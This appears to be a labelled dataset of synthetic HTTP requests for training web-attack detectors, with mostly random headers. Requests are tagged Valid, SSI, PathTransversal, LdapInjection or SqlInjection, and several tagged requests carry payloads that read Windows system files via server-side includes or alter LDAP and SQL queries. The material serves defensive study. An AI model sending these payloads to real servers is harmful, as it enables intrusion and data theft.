MIME-Version: 7.9
Pragma: az7hsi=ti
Proxy-Authorization: Digest cnonce="oiAtpy"
Authorization: nehvr wsfxvlen=lhhlacaa
Range: -657075,-968676,-4
Referer: /jasnnldn/nqdd.tiff
TE: deflate;q=0.3,deflate;q=0.7,trailers
Trailer: From
User-Agent: sT6gsisodnado
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 329x9212
Via: HTTP/8.7 www.0fdEt.js:09533
Transfer-Encoding: deflate
Upgrade: pdhrr/8.9, aln4i/2.2
Warning: 988 www.ietii.tiff "thtefthTReTd" "Fri, 09 Nov 07 08:45:51 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r2wx=ia+eoolt%oSs&ljttaattl3be9uh= e8n7mowp-tesElerwI&va7uOe=8889&imrctpeh8e=eLcNJ&l_7M=0&htbsahsobino=dos00ehtEtih&fiuyrEoo=oboe)&D08SiV98pj=879469

End - Id: 32911
Start - Id: 40632
class: SSI
GET /unaibe8tyvu/eA_8A0.mwafjKDvkd5J8/d7IU6dU.kfn/eTisfrnINtfTnnnIytd/oYTHi_vKI_fI8-/hOZxa1mJTc-8/ceTsyctto.exe?eidnshhihlhten=inr&rIg0t0=eeie&Nnno7=bwMAe9enFdhg1&eew1Lhag=7&ots=viug&itutiostou=tha%25&aet_aMfQand=tpositionniaowtfcbodytaen%3Ce&zXbRII_mhDD=lc7oTlfoCiwT5hh&wb=%3C%21--++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&2nn=45540606&gdw=g+r&rsxyIrrdtl=u&caGdcfxi=c3HXHC&tte0=rnA HTTP/1.0
Host: www.padavl0ne.uk
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: mt7d-l
Cache-Control: max-age=1
Client-ip: 90.139.110.154
Cookie: onAnmiR=l7jNzjqc7
Cookie2: $Version="00"
Date: Wed, 24 Oct 07 03:43:48 GMT
ETag: "7VJuCsYpLjlxhDcl"
Expect: 100-continue
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Fri, 30 May 08 18:45:26 UTC
If-Unmodified-Since: Wed, 05 Jan 05 14:53:57 UTC
If-Match: *
If-None-Match: *
If-Range: "lXyBqmAI8Diln-23NTX"
Max-Forwards: 780
MIME-Version: 5.2
Pragma: dSimH='iton'
Proxy-Authorization: sazlte neuhunTs=Hdeoarhe
Authorization: Basic dG5jZHJ6VHQ6aWFjYTN0OQ==
Range: -916,268-761609,54-38396
Referer: /drprec/ndmi2/eratybpe/3ynttms5.bin
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 6.9; t1-zo; rv:9.4.2) Gecko/11527531
UA-CPU: Sparc
UA-Disp: 959,926,32
UA-OS: Windows 95
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: compress
Upgrade: 3ri/5.3, 3tr/9.3, daeuf/7.9, h2tiee/5.4, i6epn/2.5
Warning: 424 133.14.61.12:42 "css3hkeeealn" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40632
Start - Id: 13483
class: Valid
GET /NLWnullEF4qoA/tyosde/swssn8emntr/OuipaaiarEga/uaxe1/r@f2dFKhWd2lBsu/1XTwhere5x/7yt/medics8lfhs/lRf.4ez0c0nC_fh.gif?7s7-loglsWv=mBdghesemUt HTTP/1.0
Host: www.doidn.ch
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-arabic, iso-8859-4
Accept-Encoding: gzip;q=0.7, identity;q=0.0, deflate
Accept-Language: sekba-rwxtoo8;q=0.3, 5sn4est-ydaa, iem8rl-unyts
Cache-Control: no-cache
Client-ip: 50.107.120.126
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Tue, 15 Dec 09 16:30:13 UTC
ETag: W/"fmSHMBSKi-_9zce"
Expect: 100-continue
From: iaeuease@fasecroo.st
If-Modified-Since: Wed, 03 Oct 07 22:45:56 GMT
If-Unmodified-Since: Sun, 03 Dec 06 13:17:09 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Nov 07 14:30:14 GMT
Max-Forwards: 2192
MIME-Version: 4.6
Pragma: idNeqame=t0siTsr
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: NTLM aWVlNHNlcnY5dG5lc0x1N3NmdGhjY25qaGNvdXpoamR4dmNkb3M=
Range: 410061-12754,11314-9
Referer: /nb3ss/S2Dotoau/pXodec/48pe.pdf
TE: gzip,deflate
Trailer: TE
User-Agent: hutitdeEe/3.5.7.7
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 801x0437
Via: 3.7 www.o8epuhtj.html:9629, lnAmb/4.3 61.36.4.91, etn/5.2 www.nep1e.shtml
Transfer-Encoding: compress
Upgrade: odo/1.8
Warning: 010 103.159.234.205 "gl6ayodfhturh" "Fri, 18 Jul 08 24:07:19 CET"
X-Forwarded-For: 25.130.189.6
X-Serial-Number: 648318819511788387
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13483
Start - Id: 32331
class: Valid
GET /3vcoMscript/mePfGaUHB/s@5libQ4Z8cmdzT/d1ksL0BY5wKTc-cRC/cs0RtctnreR7unlt/wumyFoGiOl/6n64gdnwaheoeeeh/hm/k5eoeZhttp/meuA/yQJ0NKHO@@_b/amtnwtsoPV8ui3caujoE.asmx?ih=rRebnwsl78s3tA&BFURNboDAa2l=222&dmh4Nio=1goldezn48&ptruouya=twqhnutsa&ut=e&ahdds=t%3Enulla&6sfaoarbe=l%3E3fzT&yMMr=t9rtb+s%3Cslnrboot.ini%2B+%243t%25&nyroeiittil7s6=e%2Fshtaccesenodesmai&epniEslult=wqIf HTTP/1.0
Host: 138.30.99.252
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 155.74.53.10
Cookie: kEDtitOaRe=478
Cookie2: $Version="6"
Date: Sun, 30 Nov 08 19:23:38 UTC
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Sun, 30 Apr 06 13:55:33 GMT
If-Unmodified-Since: Tue, 15 Dec 09 07:50:27 CET
If-Match: "FtH8lq8EXd43UOgwEWh"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Tue, 01 Jan 08 16:32:54 GMT
Max-Forwards: 5
MIME-Version: 1.0
Pragma: d='Ti8di7'
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Basic b2FzdGo6aGV0bHhka1M=
Range: 591942-158
Referer: http://9seieb.be/yaeae/warnsfn/saapnSfe.zip
TE: gzip;q=0.0
Trailer: Date
User-Agent: njyutenemdadody6ae
UA-CPU: StrongARM
UA-Disp: 5576,9149,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: HTTP/2.3 www.obrch.jpg
Transfer-Encoding: gzip
Upgrade: e4m/1.1, eIg/2.0, miggf/2.6, duxk/4.7
Warning: 028 12.22.183.75 "TaWSt493r1l" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 13915181953096
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32331
Start - Id: 44769
class: PathTransversal
GET /iFcuJz/m7-CpVjScdeO/hStelnet8ftQI/s1sUptn/3acsY.cgi?iceddtE=bRVCBviDG17V&nydEkaomumh=lwvH&aMbweilzi=mPROxgb&oea27e74stf=file%3A%2F%2F%2Ft%3A%2FOe%2Fynyli%2FlEMsu2se.xml&q8=dHt&xbody7bbX=NS9%3C&1a1idEwpnRSht5n=4Db0V2MuL&Nt=6 HTTP/1.0
Host: www.wteIent.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: koi8;q=0.5
Accept-Encoding: *
Accept-Language: shade-nhajS8, Ite-ram;q=0.2, so-Tcett, ip-ri0dn;q=0.4, u5etct-tanae;q=0.3
Cache-Control: cveots=4rcrturs
Client-ip: 98.197.118.87
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="576"
Date: Sat, 17 Oct 09 08:09:40 GMT
ETag: "1ec5GGBKabmuh7aMBO"
Expect: 100-continue
From: 1iogI@hndg.it
If-Modified-Since: Sat, 28 Oct 06 21:34:49 UTC
If-Unmodified-Since: Sun, 21 May 06 03:47:30 CET
If-Match: *
If-None-Match: "_Y2dn76.w9B@DcvR"
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 622
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Digest realm
Authorization: Basic TGNhdHV0YzpEZWFyb2I0
Range: 6578-336232,-258470,45228-5909
Referer: http://www.syan.de/erHdxq.pl
TE: trailers,deflate
Trailer: TE
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 9.1; nn-lo; rv:1.2.2) Gecko/75273648
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44769
Start - Id: 13306
class: Valid
GET /soehols8outjetdsa/sNf5esgvWp2_ALkcK-U/zaul4dxioceedasdau.js?SwaGi9woeUfreue=te&eddkuen=79&teedentcsii=e66JYXE&E1a7uggkinai=oYqq HTTP/1.1
Host: 110.196.34.10
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 9hr-Oibko7r;q=0.0, arh0-ix4, ao-AcAlt;q=0.1, aa-o1lhfjrf
Cache-Control: max-age=046
Client-ip: 192.245.170.164
Cookie: ecwes=e;tdiltaw7eWddv=n;7ehinuageea=jagTeai5axtTse
Cookie2: $Version="82"
Date: Fri, 14 May 04 08:41:47 CET
ETag: W/"2a10JwxUEbJ0o0pe"
Expect: 100-continue
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Fri, 02 Mar 07 13:32:11 UTC
If-Unmodified-Since: Wed, 20 Aug 08 21:33:23 CET
If-Match: *
If-None-Match: "u@8iXvg8xkUfAgIO3VYf"
If-Range: Wed, 26 Nov 08 02:44:56 GMT
Max-Forwards: 4875
MIME-Version: 8.4
Pragma: E=wa
Proxy-Authorization: NTLM ZW9hZXNVZUllMnBwU21zYWp0QU9oYXBybXNuRWVsY203dGg=
Authorization: Basic Um4ycW9sOnVtWXBlM3Q=
Range: 85-22
Referer: /tlwtenu/henydt3/b10no9.jsp
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.0 (compatible; segrNrew; Windows NT; trn9rao; 2hudn1e5x)
UA-CPU: Sparc
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: FTP/0.7 159.127.22.166, sTor/0.6 www.n4n8.css, nsl4/3.2 www.titz.gif:78524
Transfer-Encoding: compress
Upgrade: cRSP/8.6, no8s/8.1, 7spiw/8.5
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 119.172.187.41
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13306
Start - Id: 9595
class: Valid
GET /mi2dlehx/otdeUTrwsosmdIrEm/aziainjzJmtS4gwGneM/1GUmw-Mys@ln/r2@HisZCgT8Xf.BDd/sewoo/fr175j@h5/Ks@JbPT6YBKauDI/tNhwuoSzye2s8b9h/Gtt4Y5io/2zuv.cfm?ob2ieanr=%2Fh+&ace1Esepnoiqad=clhtu&4fDoptTFMgKperl=tQ7RzgglHs&m_having3Y=rse2S4o%3D&7wgBceUKXreplace0=houoestWpl&GCA9E=nFmox1&nbii=98731534&eccteelzr=b9hsrR&CstyleYlQu=d4rmu&iecai9mab6=tzT&otdrao8y=qunieelm9losnibsu&iRnt72tnknahmrw=nj&vl0ldremtsa=ot0log&11ceo=69&h6f=eaQ1i HTTP/1.0
Host: 59.206.151.46
Connection: keep-alive
Accept: application/rtf, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: t9ren6sp=she
Client-ip: 127.156.133.240
Cookie: 6jeRi6pijoisue=ebt?$;p1E7=Rtyyoe2boxdooiwna;4fqs=ypgX@J1Rr
Cookie2: $Version="4"
Date: Tue, 09 Sep 08 07:24:37 CET
ETag: W/"UBxHWof-HvmgpxD"
Expect: orfe=rnsch
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Wed, 24 Jun 09 17:03:18 UTC
If-Match: *
If-None-Match: *
If-Range: "rZ4ojGoS11PyNLRLJ4x"
Max-Forwards: 207
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/3kteNf/fyt4nept.nsf
Authorization: NTLM YWNhaXRvc2FhNDBzYWxnaWlOZGhpYXR5YWFsYWlPbmFsdDU=
Range: -7342
Referer: http://rdt4tuko.st/cvst.msf
TE: trailers,chunked,trailers
Trailer: Host
User-Agent: yesol (nKUeN5mWjV; 5ySunn4F; duWlvAXO; pdoI.Pp241; o8Jiypc4)
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7883x011
Via: HTTP/1.4 www.ro0Gsse.html, HTTP/9.5 41.182.64.189, FTP/4.1 www.q15n.png
Transfer-Encoding: identity
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 225.176.97.169
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9595
Start - Id: 40626
class: SSI
GET /shutdowndivH/c69VteI.tiff?rgnahh=%3C%21--%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E HTTP/1.0
Host: 237.44.2.36
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=0
Client-ip: 134.67.83.123
Cookie: rraoo=22520
Cookie2: $Version="48"
Date: Sun, 15 May 05 20:22:12 UTC
ETag: "IubpgWrdF_VsRCB06yK"
Expect: 100-continue
From: eneiaiie@acs8.cz
If-Modified-Since: Tue, 20 Jan 09 18:07:50 UTC
If-Unmodified-Since: Mon, 10 Jan 05 16:33:13 UTC
If-Match: *
If-None-Match: *
If-Range: "CzLcEa@yb2GNdmbL"
Max-Forwards: 248
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: wssi Mwmtoon=YEtd6
Authorization: oWis nNNdt=vijfe
Range: 656012-5
Referer: http://sNio.be/trpAmv/elr2ate/3udsreeu/beijate.aspx
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: efmtrse
UA-Disp: 959,926,32
Via: HTTP/9.6 160.119.203.120, 0.2 246.214.58.247
Transfer-Encoding: ri2g
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 9481598521
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40626
Start - Id: 27395
class: Valid
GET /mais/qZYVKrL_RMttK7wVEi/ahin6.sh?dmjtd530ckuo=3182438&frdropPW0o=w&snev8rit6=6eile3ht&hminOltysen3s=qenn&nzt=sdEcti8u%7C9tStia&aqkcecdsmcae=3&CVsUajNF=+shtacceste&gPnvoemeTe=ep0X6y HTTP/1.0
Host: 97.202.80.97
Connection: close
Accept: */*
Accept-Charset: euc-tw, windows-874, x-mac-chinesesimp, utf-7
Accept-Encoding: identity, compress;q=0.7, deflate
Accept-Language: *
Cache-Control: dld='h25oc8R4'
Client-ip: 98.21.57.18
Cookie: cdhIehhSumjiv=3433
Cookie2: $Version="47"
Date: Fri, 23 May 08 21:49:55 UTC
ETag: W/"vB7E3Anf@TEEZMA3D.UI"
Expect: d2al0
From: glqntj@hA8egh.fr
If-Modified-Since: Fri, 17 Nov 06 09:02:39 CET
If-Unmodified-Since: Sat, 23 Jul 05 06:39:22 GMT
If-Match: "IoT2@ulSZgS4bwq"
If-None-Match: *
If-Range: *
Max-Forwards: 43
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic ZmFpbXQ6ZXQxU3I=
Authorization: NTLM aXJ6aGhjaWtidG9yN2VydG51bGZjT2pNeGFzZmFhaXNyMmV0ZTJOYWtONA==
Range: 13-62
Referer: http://www.t2lAtj.uk/epndt8kT/irciiy.jsp
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: etscln (icu5TX.U; mMqFIElUN; d226M2_B; nq_YISlxe)
UA-CPU: 68000
UA-Disp: 009,2103,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9698x542
Via: HTTP/5.3 116.25.171.100, 4.1 www.xmaii91o.js, FTP/7.0 14.121.177.133
Transfer-Encoding: e65y; ioa9=Gtbdcaim
Upgrade: uroe/2.4, Rrt/3.7
Warning: 680 www.tdeh77g.gif "z1eLBiT0" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 012150343166763006
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27395
Start - Id: 38527
class: LdapInjection
GET /3mpuppm6lUhieehwyo/d1sberK4Eym/efncEhna8htrdfntEZH/g3kH1-BwJ/5flTYK6iz7UWQi4h/obebheaihhu/d4mjYt0Np@G.sh?LDJBMizpositionscriptM=F%28%26whisendyselectn&dn=sMH-Pr&gowsFnhesTb=1320211&ENamtme=nuert%29%28+++%7C+++%28lnhto%3D*%29&sEr9gecenine7u=urme%24cdomhooeteT&ftsdlngtd4g=hwindow.opent0r&4gshutdowndHrrandgG=813&xco=04572207&tieoq1h=dras&hh6n=%3DgSeha%40+&29araotti=+%3C6c&aop=t.5G_AQSeM&4NVKUa0ZX=+od%3Et-%3CaacceptedvG3imgoni+ HTTP/1.0
Host: www.0datmt.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-turkish, windows-1253, windows-1258;q=0.6
Accept-Encoding: deflate;q=0.3, deflate;q=0.3, gzip, gzip;q=0.7
Accept-Language: 3ayohs-esarijjl;q=0.8, sblhidii-uoILE1, 3opfR-i, htsesso-ieodliu;q=0.5, 5euntidH-goiSud
Cache-Control: no-cache
Client-ip: 127.100.106.138
Cookie: teeuospl=>e ;6w=~nl;e6cuneiesma=tz0VQVaZV;nefnt2eVuta=i.4uZZB
Cookie2: $Version="13"
Date: Wed, 04 Nov 09 20:12:17 GMT
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Thu, 24 Sep 09 16:10:07 CET
If-Unmodified-Since: Tue, 28 Apr 09 16:13:43 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Apr 08 14:26:54 CET
Max-Forwards: 031
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: 548411-,-37195
Referer: http://uFynrWo.net/nqttE1/3MEhc/hpotone3/eoNg.tiff
TE: trailers
Trailer: If-Range
User-Agent: QaopdoremZ/3.3.9.1
UA-CPU: MIPS
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 3.7 77.254.115.145, 1.0 150.49.36.91
Transfer-Encoding: deflate
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38527
Start - Id: 17705
class: Valid
GET /dGNk69Q8q.k/s5SselectnhSQBZ/ehlhvOoeae3d/oA/sipsianteodl3sf/e6K6iJ4I/iuLhT/aa/wjmAZqfXy/c9PnlagM9LARI3./raqpm.msf?hastir=eM-YF1V0Tj&htneutudtacy=630523&mo4u2=jaSu4moIlbF6&3aitftligl=6082&Dt0gYdenF=49288&pkaeihm0=77031653&6mioohurs7=9tr+&otruiec=9&psetl3hsiZ=4&t7e2i5aooiaSIMq=9522255544&estapobwxo=eitgetfheynwta&A8rcpx=581&samreA=5052&rrbADn1r=%3Avd%2F%7Es2x+4sOeiirMm%25 HTTP/1.0
Host: www.eglknn.com:80
Connection: keep-alive
Accept: image/*, video/*;q=0.2, text/xml
Accept-Charset: x-mac-icelandic, iso-10646-ucs-2, gb2312, x-mac-roman;q=0.7, iso-8859-8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 142.96.191.196
Cookie: sItowe= fatdst;sehOi=risnetrl3;O2ahu=dwmm;rw6ou=99302;rj=HEhustae
Cookie2: $Version="9"
Date: Sun, 03 Jun 07 10:01:26 UTC
ETag: "DWYPHRUU5ciuYwz."
Expect: 100-continue
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 29 Jan 08 08:19:08 UTC
If-Unmodified-Since: Sat, 16 Jun 07 06:29:25 UTC
If-Match: "VRhx8xM-39fzJN7r1Y"
If-None-Match: "dBz_FfbAVTRxusjboD"
If-Range: *
Max-Forwards: 5
MIME-Version: 4.2
Pragma: or='ex4in'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: AMsas teetvwf=eidyws
Range: -579,-690
Referer: /zek76ses/earfa/vy1yn/loaf.exe
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: ueeomck
UA-CPU: PowerPC
UA-Disp: 5186,988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 0.1 119.225.227.47:67180
Transfer-Encoding: deflate
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 197606037
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17705
Start - Id: 41293
class: SqlInjection
GET /BUDxFixml6bJ9Zprocessing-instructionS/Ier6tllyrnIf9n/tCcDKK/eDsiaz/WXG7mdnhtaccesZN/8Fg.copy/rraerc/tx1hVW@ou177GnJ6/insertKaRpkJY8L/jjz/apr60odtqaN8o.jpg?cc=pm+f7+dE&di=23%28tednvar&caaKefrctm=ri%29%28&pyyegYOIe=00676605&K00lVZQKf-=eett+u&smh=eOLoC&pt@IOJgGe.r=fTeDqten&sniecelcIawt=iihimIqtufi HTTP/1.1
Host: www.hytoidE.biz:0
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.7, x-mac-turkish;q=0.1
Accept-Encoding: deflate;q=0.9, deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.181.96.245
Cookie: hiwaemBe=OR 'salditc'   LIKE 'Sim%'
Cookie2: $Version="7"
Date: Thu, 05 Feb 09 06:56:20 UTC
ETag: W/"g_lFTiKjT0lFJ077"
Expect: nrtl=nlejage;ovtlr3u
From: q5mitc@si2ecNlvy.uk
If-Modified-Since: Wed, 26 Oct 05 10:27:47 UTC
If-Unmodified-Since: Sun, 10 May 09 04:06:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ifbj"
Authorization: ge8k sztt=to0c3
Range: 9-769078
Referer: http://adasde.net/r5oes/uknahha/hhAni/Seh7sstg.conf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 9.4; hn-nk; rv:1.4.9) Gecko/42063714
UA-CPU: x86
UA-Disp: 7287,0720,32
UA-OS: Win95
UA-Color: color8
Via: FTP/7.7 79.113.4.235
Transfer-Encoding: fr3ed; q8hks=sw2v
Upgrade: 1aa8/1.9, huin/7.7, ykium/1.0
Warning: 540 4.59.66.37 "ldiyu46vmehap" "Tue, 26 Feb 08 07:23:38 GMT"
X-Forwarded-For: 58.246.93.212
X-Serial-Number: 672862
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41293
Start - Id: 38748
class: LdapInjection
GET /a-2dB9@jfWR74sP/tel3lj9fseho/trjwaaxs/e28VDLEZ3/settbecfsih5ermeeH/aKttq/uvHj/pOqhUVG5.jYdNs/1NIiXSzM@Sq0MQG/oU9q/ndqit.asp?rbRinoeossnp=nrarn&p8e7entt=%29++++%28++%7C++%28+++cn%3D*o++%27brien*++%29%28mail++++%3D*o%27brien*+%29+++&sn=ariseR&ptsYr=tm%3Btg9necgiifromo&cjIn=%28%2Fa%25le2bai%28esccaalki&hytEcIxtee=8834109458&ecofFcn5Set=skz2Os1bHx&4nullWrxq=eO&nelp=806 HTTP/1.0
Host: 122.143.60.218
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-6, utf-7;q=0.9, iso-8859-7, iso-8859-15;q=0.5
Accept-Encoding: 
Accept-Language: onULsHd-ec5, 3r-nyOeNyt;q=0.5, n9-3u;q=0.9, traa-S6qalce
Cache-Control: max-age=876
Client-ip: 111.176.120.104
Cookie: s9orz8q7j2g= a;alaqRnornpt=vxi;;mbufneos2AnQlhj=16600;aSieiecizmex9i=?7de;lEtfrt5rzatas=ssystem]e;lmErbea8n34adnu=olBpvE
Cookie2: $Version="482"
Date: Sat, 17 Jun 06 02:52:09 UTC
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Sun, 08 Jul 07 16:55:19 CET
If-Unmodified-Since: Sat, 30 Sep 06 09:38:24 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jan 04 16:28:32 UTC
Max-Forwards: 7797
MIME-Version: 5.3
Pragma: t='b'
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: s5dai izdatts=otssshge
Range: 6-630560,55-36780
Referer: /70zsa/mee5oreR/miuOn.pl
TE: chunked,deflate,gzip
Trailer: Upgrade
User-Agent: rFedpti/6.2.8.1
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 4.2 182.81.145.83
Transfer-Encoding: compress
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38748
Start - Id: 5319
class: Valid
POST /rhpfet5neSevn7he4/oqonlni.css? HTTP/1.0
Content-Length: 13
Content-Language: yerkaio,8fk2Na1,heitiwpl
Content-Encoding: compress
Content-Location: http://www.rl2aihhi.be/zhrc/8btotep.php4
Content-MD5: c2xubTdybWFyeVVzb09uNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Jan 07 24:03:56 GMT
Last-Modified: Thu, 22 Dec 05 14:44:03 GMT
Host: www.eTwwrrA7ej.org
Connection: aetp4
Accept: text/*;q=0.7
Accept-Charset: windows-1257;q=0.3
Accept-Encoding: deflate, identity;q=0.4
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 149.116.147.125
Cookie: yeneudinh57=er2CrR5m+ra;otobatx9z=285325;ttOg3ryihewwuiu=6rhzs8ckwgetn
Cookie2: $Version="95"
Date: Sun, 04 Apr 10 03:52:41 CET
ETag: "152va90sIrK.1Oj_ALtg"
Expect: enfl
From: hsviii@dds6i8NT.ch
If-Modified-Since: Tue, 13 May 08 16:09:27 UTC
If-Unmodified-Since: Fri, 23 Jan 09 04:08:39 CET
If-Match: *
If-None-Match: "ZPKRM52iJzH6MmZ"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic cmltcU06SDNyb3Jl
Authorization: NTLM Y3Jmb05laDhsYnRsc2RlcnRiaG9yZW5ld29tbGZmN2VpYWRo
Range: 8822-34,539805-
Referer: http://www.Fian.gov/s83si/qtnan/tioeek/hleue.php4
TE: trailers
Trailer: Date
User-Agent: aytTspermE/1.1.2.5
UA-CPU: MIPS
UA-Disp: 370,737,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4339x4945
Via: 7.8 217.9.119.114:842, 3.7 29.7.254.205
Transfer-Encoding: gzip
